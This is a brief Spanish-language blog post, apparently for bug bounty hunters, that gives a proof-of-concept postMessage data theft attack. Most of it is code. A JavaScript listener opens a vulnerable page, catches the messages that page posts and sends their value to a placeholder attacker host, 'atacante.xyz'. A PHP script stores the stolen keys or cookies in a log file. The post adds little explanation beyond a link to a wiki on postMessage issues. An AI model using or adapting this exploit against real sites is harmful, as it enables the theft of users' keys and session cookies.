El siguiente es un Poc para robo de datos utilizando postMessage:
<script>
function listener(event) {
//alert(event.data.value);
var str = event.data.value;
var xmlhttp;
if (window.XMLHttpRequest)
{
xmlhttp=new XMLHttpRequest();
}
else
{
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
params = "keys="+str;
xmlhttp.open("POST","http://atacante.xyz/postMessage.php",false);
xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.setRequestHeader("Accept-Language","es-MX,es;q=0.8,en-US;q=0.5,en;q=0.3");
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp.send(params);
}
var dest = window.open("http://vulnerable.com/keys");
window.addEventListener("message", listener);
</script>
<?php
if(isset($_POST['keys'])){
$cookie = $_POST['keys'];
$steal = fopen("log.txt", "a");
fwrite($steal, $cookie ."\n"); //<---- Must be $cookie instead of $name
fclose($steal);
}
?>
Informacion sobre esto: https://github.com/EdOverflow/bugbountywiki/wiki/postMessage-issues
No hay comentarios:
Publicar un comentario